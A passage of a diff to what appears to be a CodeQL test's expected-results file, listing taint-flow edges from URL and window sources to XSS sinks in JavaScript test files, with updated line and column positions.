@@ -879,12 +879,12 @@ edges | pages/[id].jsx:5:18:5:29 | router.query | pages/[id].jsx:5:9:5:14 | { id } | provenance | | | pages/[id].jsx:13:44:13:49 | params [id] | pages/[id].jsx:13:44:13:52 | params.id | provenance | | | pages/[id].jsx:16:44:16:49 | params [q] | pages/[id].jsx:16:44:16:51 | params.q | provenance | | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [id] | pages/[id].jsx:3:30:3:35 | params [id] | provenance | | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [q] | pages/[id].jsx:3:30:3:35 | params [q] | provenance | | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [id] | pages/[id].jsx:3:30:3:35 | params [id] | provenance | | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [q] | pages/[id].jsx:3:30:3:35 | params [q] | provenance | | | pages/[id].jsx:25:11:25:24 | context.params | pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | provenance | | -| pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [id] | provenance | | +| pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [id] | provenance | | | pages/[id].jsx:26:10:26:22 | context.query | pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | provenance | | -| pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [q] | provenance | | +| pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [q] | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:18:8:24 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:9:27:9:33 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | 
@@ -943,8 +943,8 @@ edges | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:22:11:22:30 | source | provenance | | | translate.js:6:7:6:39 | target | translate.js:7:42:7:47 | target | provenance | | | translate.js:6:16:6:39 | documen ... .search | translate.js:6:7:6:39 | target | provenance | | -| translate.js:7:7:7:61 | searchParams | translate.js:9:27:9:38 | searchParams | provenance | | -| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:9:27:9:38 | searchParams [MapValue] | provenance | | +| translate.js:7:7:7:61 | searchParams | translate.js:8:27:8:38 | searchParams | provenance | | +| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:8:27:8:38 | searchParams [MapValue] | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) | translate.js:7:7:7:61 | searchParams | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | translate.js:7:7:7:61 | searchParams [MapValue] | provenance | | | translate.js:7:42:7:47 | target | translate.js:7:42:7:60 | target.substring(1) | provenance | | 
@@ -954,8 +954,8 @@ edges | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | -| translate.js:9:27:9:38 | searchParams | translate.js:9:27:9:50 | searchP ... 'term') | provenance | Config | -| translate.js:9:27:9:38 | searchParams [MapValue] | translate.js:9:27:9:50 | searchP ... 'term') | provenance | | +| translate.js:8:27:8:38 | searchParams | translate.js:8:27:8:50 | searchP ... 'term') | provenance | Config | +| translate.js:8:27:8:38 | searchParams [MapValue] | translate.js:8:27:8:50 | searchP ... 'term') | provenance | | | trusted-types-lib.js:1:28:1:28 | x | trusted-types-lib.js:2:12:2:12 | x | provenance | | | trusted-types.js:3:62:3:62 | x | trusted-types.js:3:67:3:67 | x | provenance | | | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:62:3:62 | x | provenance | | 
@@ -973,217 +973,217 @@ edges | tst3.js:7:32:7:35 | data | tst3.js:7:32:7:37 | data.p | provenance | | | tst3.js:9:37:9:40 | data | tst3.js:9:37:9:42 | data.p | provenance | | | tst3.js:10:38:10:41 | data | tst3.js:10:38:10:43 | data.p | provenance | | -| tst.js:2:7:2:39 | target | tst.js:5:18:5:23 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:12:28:12:33 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:20:42:20:47 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:4:18:4:23 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:9:28:9:33 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:17:42:17:47 | target | provenance | | | tst.js:2:16:2:39 | documen ... .search | tst.js:2:7:2:39 | target | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | Config | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
    ' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... 
ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... 
search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... 
.search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... 
.search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... 
Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... 
hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... 
.search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... 
bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... 
.search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... 
t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
    ' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... 
ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | 